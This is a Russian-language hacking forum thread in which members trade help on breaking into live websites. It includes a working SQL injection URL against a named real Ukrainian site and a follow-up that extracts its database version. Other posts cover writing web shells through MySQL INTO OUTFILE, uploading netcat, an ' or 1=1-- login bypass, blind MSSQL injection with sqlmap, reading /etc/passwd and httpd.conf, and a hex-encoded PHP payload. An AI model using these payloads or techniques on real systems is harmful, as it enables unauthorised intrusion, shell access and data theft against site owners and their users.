Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. korih

    korih New Member

    Joined:
    6 Nov 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    пошло-поехало! ура! действительно, всё что надо было, это поставить в конце "?". спасибо большое Ganz Euler)
     
  2. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
    Слепая ли это и как раскрутить правильно...
    http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
    спасибо...
     
  3. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    title смотрите.
     
    1 person likes this.
  4. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,version(),6--

    Все выводит.
     
    _________________________
    1 person likes this.
  5. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Добрый день! Подскажите пожалуйста, по заливке шелла

    Заливаю файл через phpmyadmin под пользователем root. File_priv=Y Grant_priv=Y
    Знаю полный путь до сайта через phpinfo, и знаю точные папки доступные под запись.
    В /tmp заливается без проблем файл и считывается тоже.

    Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.
     
    #23245 Evil_Genius, 8 May 2014
    Last edited: 8 May 2014
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.
     
  7. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Да действительно, сейчас залился через админку netcat. Права на сайт полные, но юзер какраз другой. Видимо из-за этого и не заливалось((
     
  8. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    Задача: нужно сдампить 3 колонки с помощью sqlmap
    column1 - int
    column2,3 - varchar

    Но почему то дампится только одна колонка
    По отдельности, все нормально. В чем может быть причина?
    Синтаксически запрос составляю верно
     
  9. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Привет, прошу помощи:
    Есть asp сайт, при помощи ' or 1=1-- в поле пассворд можно залогинится под юзером, я так полагаю под 1 юзером в бд, но это не админ.
    Как-то можно раскрутить это?
    PHP:
    Microsoft VBScript runtime error '800a000d'  Type mismatch'Cint' 
    вот еще, помогите пожалуйста, а то не знал, не знал да и забыл все в скулях

    UPDATE
    PHP:
    Microsoft OLE DB Provider for SQL Server error '80040e14'  Unclosed quotation mark after the character string '8''. 
    при .asp?itemkey=12345678' проблема в том что стоит фильтир, если неравно 9 символом, то выскакивает еррор пейдж, есть ли возможность обойти?///


    UPD
    есть blind MSsql inj, подкиньте маны, а то гугл не помогает

    //
    karoche mana est'
    теперь нужен софт для раскрутки blind MSSQL injection, или кто гуру - какие параметры кормить sqlmap?
    иньекция в поле пассворд, логика
    PHP:
    password '' or {MY STATEMENT HERE}
    как-то так
    ПС
    походу надо писать софт, ибо если руками перебирать то можно в психушку попасть :mad:

    АПДЕЙТ
    Я еще не в психушке, хорошый мануал по ms sql _ttp://www.exploit-db.com/papers/12975/
     
    #23249 wkar, 12 May 2014
    Last edited: 13 May 2014
  10. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Может ли быть xss в ответе аякса если не фильтруются < и > ?

    пробовал добавлять html / body head и т.п.
    ничего не выходило
     
  11. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Вероятно, сервер отдает Content-Type: text/*
    Поведение разных версий браузеров может варьироваться.
     
  12. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Условия:
    1. File_priv: Y
    2. Возможно читать файлы
    3. Возможное раскрытие путей через Wordpress
    4. Заливка файла через INTO OUTFILE - возможна.
    Всё-бы нечего, НО:

    Начнём историю по порядку - во-первых на самом сайте через wp-config запрещён доступ к theme-editor и plugin-editor всем пользователям.

    Но я не отчаивался, т.к. File_priv: Y.
    Всё вроде бы ничего и даже получил раскрытие путей, однако:
    Уже это насторожило, т.к. сам блог находится по адресу site.com/blog/, но я не сдавался и шел по избранному мною пути:

    1. :mad::mad::mad:
    Супервозмущение :mad::mad::mad::mad:
    Но я не отчаивался и шёл!

    Дошёл до
    2. :)
    И вот, я кажется дошёл. Но тут подвох - я перепробовал все возможные комбинации и даже очень опасную, однако даже она дала сбой :mad:
    Can't create/write to file '/home/httpd/html/huipizdamatreshka/' (Errcode: 21)
    Если подставлять вместо опасного запроса, запрос вида: into+outfile+'/home/httpd/html/site/1.txt'-- , либо любой другой, то получаю ошибку Errcode: 2 , т.е. нет директории site.

    Читал на форумах, что в случае, если адрес не известен, то читаем файл httpd.conf (прочитал его по /etc/httpd/conf/httpd.conf ).
    Нашёл в нём: DocumentRoot "/var/www/html" и всё равно провалился. Чтобы не делал - результат один Errcode 2, 13, 21 :(:(:(

    Есть ли у кого-нибудь, какие-нибудь предположение или догадки, как найти полный путь до папки? :eek: Кстати, нет-нет, но закачал файл в /tmp/ . Результат :)
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    1)поищи phpinfo
    2)/home/httpd/html/site/shared - сюда пробовал заливатся?
    3)прочитай htaccess посмотри как настоено
    4)прочитай etc/passwd
    5) попробуй другие пути,
    /var/www/html/domain/
    /var/www/html/site/domain/

    и тд, вариантов уйма, ты сдался ничего не сделав
     
  14. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    1. Искал phpinfo, даже пытался его выводить через concat(0x3c3f20706870696e666f28293b203e) . Нет результата.

    2. Да. Пробовал. Также пробовал все возможности /home/httpd/html/public_html/ , все варианты через /home/httpd/html/папка/ - выдаёт Errcode: 21. Если /home/httpd/html/папка/сайтилипапка/file - Errcode: 2

    3. Корневой хтач? Как я его прочту если не знаю пути :/ По пути через ошибку WP - /home/httpd/html/site/shared/wp/live/wp-content/.htaccess , /home/httpd/html/site/shared/wp/live/.htaccess , /home/httpd/html/site/shared/wp/.htaccess , /home/httpd/html/site/shared/.htaccess, /home/httpd/html/site/.htaccess . Толку нету :mad:

    4. Пробовал другие варианты. Результат, как я говорил выше - Errcode: 2, Errcode: 21, Errcode: 13 :rolleyes:
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    это сильно, напомнил кое кого..

    ты уверен что сайт и база на одном серваке? пробовал читать какой нить файл?
     
    _________________________
  16. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Да. Сильно. Использовал всё, что пишут :eek:
    Да. Читал etc/password
     
    #23256 Aniweste, 20 May 2014
    Last edited: 20 May 2014
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    я не про пассвд, файл пассвд есть везде, имеются ввиду файлы сайта, чтобы быть уверенным что сайт и бд на одной физической машине. файлы сайта читал?
     
    _________________________
  18. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Присоединяюсь к вопросу. Возможно, веб и бд находятся на разных серверах, или у одного к другому просто прав нет. Попробуйте прочитать конфиги веб-демона, логи, robots.txt || index.php с сайта. Passwd маловат для хостинга, если только дед или впс.
    Также могут помочь /etc/hosts и current_user() & SELECT @@HOSTNAME в mysql.
     
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Это иногда работает ;)
     
    _________________________
  20. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Чуть с кодом ошибся, такой вставь.

    concat(0x3c3f70687020706870696e666f28293b203f3e)
     
    _________________________
    #23260 kingbeef, 20 May 2014
    Last edited: 20 May 2014
Thread Status:
Not open for further replies.